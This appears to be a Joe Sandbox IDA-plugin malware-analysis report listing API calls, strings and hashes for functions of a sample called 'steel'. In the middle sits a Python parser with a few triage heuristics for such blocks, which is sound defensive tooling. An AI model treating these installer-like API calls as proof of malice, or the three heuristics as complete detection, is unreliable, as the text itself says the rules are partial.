                                                                                            • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                            • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                            • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                            • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                            • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                            • API String ID: 1452528299-1580325520
                                                                                            • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                            • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                            • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                            • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                            • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDeviceMetricsSystem$Release
                                                                                            • String ID:
                                                                                            • API String ID: 447804332-0
                                                                                            • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                            • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                            • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                            • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                            • LocalFree.KERNEL32(0056FAA8,00000000,00401B68), ref: 00401ACF
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0056FAA8,00000000,00401B68), ref: 00401AEE
                                                                                            • LocalFree.KERNEL32(00570AA8,?,00000000,00008000,0056FAA8,00000000,00401B68), ref: 00401B2D
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                            • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3782394904-0
                                                                                            • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                            • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                            • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                            • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                            APIs
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long$Show
                                                                                            • String ID:
                                                                                            • API String ID: 3609083571-0
                                                                                            • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                            • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                            • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                            • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                            APIs
                                                                                              • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                            • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                            • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                              • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                            • String ID:
                                                                                            • API String ID: 3527656728-0
                                                                                            • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                            • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                            • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                            • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFileHandle
                                                                                            • String ID: !nI$.tmp$_iu
                                                                                            • API String ID: 3498533004-584216493
                                                                                            • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                            • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                                                            • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                            • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                                            APIs
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                              • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                              • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                                                            • API String ID: 3312786188-1660910688
                                                                                            • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                            • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                            • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                            • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                            • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                            • API String ID: 828529508-2866557904
                                                                                            • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                            • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                                            • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                            • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
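The function blocks above (API list, "String ID", opcode and fuzzy hashes) are what the Joe Sandbox IDA plugin emits per function; reading dozens of them by hand is slow, and the argument lists are raw stack slots in which "?" marks a value the sandbox could not resolve and entries past an API's real parameter count are stack residue. The following is an added example, not Joe Sandbox code and not part of the report: a small parser for this block layout plus a few triage heuristics of my own (dynamic API resolution via GetProcAddress, registry hive names in the string set, and a decoder that names the documented CreateFileA access and disposition values). The sample text is a constructed excerpt: the first two blocks copy the SetLastError and CreateFileA functions on this page, the third mixes the ShutdownBlockReasonCreate function with a "Part of subcall function" line so that form is exercised as well.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt in the Joe Sandbox IDA-plugin layout used on this page (values copied from
# the report; the "Associated" lines are omitted). Block 3 is a deliberate mix of two functions.
SAMPLE = """\
APIs
• SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
• SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
Strings
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast
• String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
• API String ID: 1452528299-1580325520
• Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
Similarity
• API ID: CloseCreateFileHandle
• String ID: !nI$.tmp$_iu
• Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
APIs
  • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
Similarity
• API ID: AddressByteCharHandleModuleMultiProcWide
• String ID: ShutdownBlockReasonCreate$user32.dll
• Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
"""

# "• Name.MODULE(args), ref: ADDR" or "• Part of subcall function ADDR: Name.MODULE ref: ADDR"
API_RE = re.compile(
    r"^•?\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# "• Key: value" metadata lines (API ID, String ID, fuzzy hashes, ...)
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list          # raw stack slots as printed; '?' = unresolved
    ref: int            # call-site address
    subcall_of: str = ""  # set when the line came from a "Part of subcall function" entry


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def strings(self):
        # Joe Sandbox joins the function's referenced strings with '$'
        v = self.fields.get("String ID", "")
        return v.split("$") if v else []


def parse_blocks(text):
    """Split plugin output into one FunctionBlock per 'APIs' section."""
    blocks, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if not s:
            continue
        if s == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(s)
        if m:
            args = m.group("args").split(",") if m.group("args") is not None else []
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                    int(m.group("ref"), 16), m.group("subfn") or ""))
            continue
        m = KV_RE.match(s)
        if m:
            cur.fields[m.group("key")] = m.group("val").strip()
    return blocks


ACCESS_BITS = ((0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
               (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL"))
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
REG_ROOTS = {"CLASSES_ROOT", "CURRENT_USER", "MACHINE", "USERS"}


def decode_createfile(call):
    """Name dwDesiredAccess (arg 1), dwCreationDisposition (arg 4) and dwFlagsAndAttributes (arg 5).
    CreateFileA takes seven parameters; anything after that in the dump is stack residue."""
    a = call.args[:7]
    if len(a) < 7 or "?" in (a[1], a[4], a[5]):
        return None
    access = int(a[1], 16)
    return {"access": [n for bit, n in ACCESS_BITS if access & bit],
            "disposition": DISPOSITION.get(int(a[4], 16), "UNKNOWN"),
            "attributes": int(a[5], 16)}


def triage(block):
    """Heuristic notes for one function block (my own rules, not Joe Sandbox signatures)."""
    notes = []
    direct = {c.name for c in block.apis if not c.subcall_of}
    strings = block.strings
    if "GetProcAddress" in direct:
        targets = [s for s in strings if not s.lower().endswith(".dll")]
        notes.append("dynamic API resolution: " + ", ".join(targets))
    roots = sorted(REG_ROOTS & set(strings))
    if roots:
        notes.append("registry hive names: " + ", ".join(roots))
    for c in block.apis:
        if c.name == "CreateFileA" and (d := decode_createfile(c)):
            notes.append(f"CreateFileA {'|'.join(d['access'])} {d['disposition']}"
                         + (" (.tmp name)" if ".tmp" in strings else ""))
    return notes


if __name__ == "__main__":
    for i, b in enumerate(parse_blocks(SAMPLE), 1):
        calls = ", ".join(f"{c.name}@{c.ref:08X}" for c in b.apis)
        print(f"[{i}] {b.fields.get('API ID', '?')}: {calls}")
        for n in triage(b):
            print("     -", n)
```

The CreateFileA block on this page decodes to GENERIC_READ|GENERIC_WRITE with CREATE_ALWAYS and FILE_ATTRIBUTE_NORMAL alongside the ".tmp" and "_iu" strings, and the ShutdownBlockReasonCreate block resolves a single non-DLL name through GetProcAddress; both are consistent with an installer stub rather than evidence of malicious behaviour on their own, which is why the notes are phrased as observations for an analyst and not verdicts. Extend `triage` with the API names that matter for your case (the report's own signature list above is a good source) rather than treating the three rules here as complete.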
                                                                                            APIs
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                            • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                            • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                            • API String ID: 2573145106-3235461205
                                                                                            • Opcode ID: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                            • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                            • Opcode Fuzzy Hash: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                            • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                            • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                            • API String ID: 3478007392-2498399450
                                                                                            • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                            • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                            • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                            • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                            APIs
                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                            • String ID: AllowSetForegroundWindow$user32.dll
                                                                                            • API String ID: 1782028327-3855017861
                                                                                            • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                            • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                            • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                            • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                            APIs
                                                                                            • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                            • SaveDC.GDI32(?), ref: 00416C83
                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                            • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                            • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                            Similarity
                                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                            • String ID:
                                                                                            • API String ID: 3808407030-0
                                                                                            • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                            • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                            • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                            • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                            APIs
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                            • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                            • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                            • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                            • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                            • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                            • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                            • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                            • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                            • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
